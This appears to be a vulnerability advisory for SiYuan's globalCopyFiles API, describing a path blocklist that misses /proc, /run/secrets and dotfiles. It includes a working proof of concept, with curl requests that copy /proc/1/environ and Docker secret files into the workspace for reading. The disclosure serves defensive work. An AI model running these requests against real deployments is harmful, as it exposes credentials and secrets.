Description

SiYuan globalCopyFiles: incomplete sensitive path blocklist allows reading /proc and Docker secrets

Summary

POST /api/file/globalCopyFiles reads source files using filepath.Abs() with no workspace boundary check, relying solely on util.IsSensitivePath() whose blocklist omits /proc/, /run/secrets/, and home directory dotfiles. An admin can copy /proc/1/environ or Docker secrets into the workspace and read them via the standard file API.

Details

File: kernel/api/file.go - function globalCopyFiles

for i, src := range srcs {
    absSrc, _ := filepath.Abs(src)

    if util.IsSensitivePath(absSrc) {
        return
    }
    srcs[i] = absSrc
}...
Show more

IsSensitivePath blocklist (kernel/util/path.go):

prefixes := []string{"/etc/ssh", "/root", "/etc", "/var/lib/", "/."}

Not blocked - exploitable targets:

PoC

Environment:

docker run -d --name siyuan -p 6806:6806 \
  -v $(pwd)/workspace:/siyuan/workspace \
  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123

Exploit:

TOKEN="YOUR_ADMIN_TOKEN"

curl -s -X POST http://localhost:6806/api/file/globalCopyFiles \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"srcs":["/proc/1/environ"],"destDir":"data/assets/"}'

curl -s -X POST http://localhost:6806/api/file/getFile \...
Show more

Docker secrets:

curl -s -X POST http://localhost:6806/api/file/globalCopyFiles \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"srcs":["/run/secrets/db_password","/run/secrets/api_token"],"destDir":"data/assets/"}'

Impact

An admin can exfiltrate any file readable by the SiYuan process that falls outside the incomplete blocklist. In containerized deployments this includes all injected secrets and environment variables - a common pattern for passing credentials to containers. The exfiltrated files are then accessible via the standard workspace file API and persist until manually deleted.

Mitigation

Aliases

References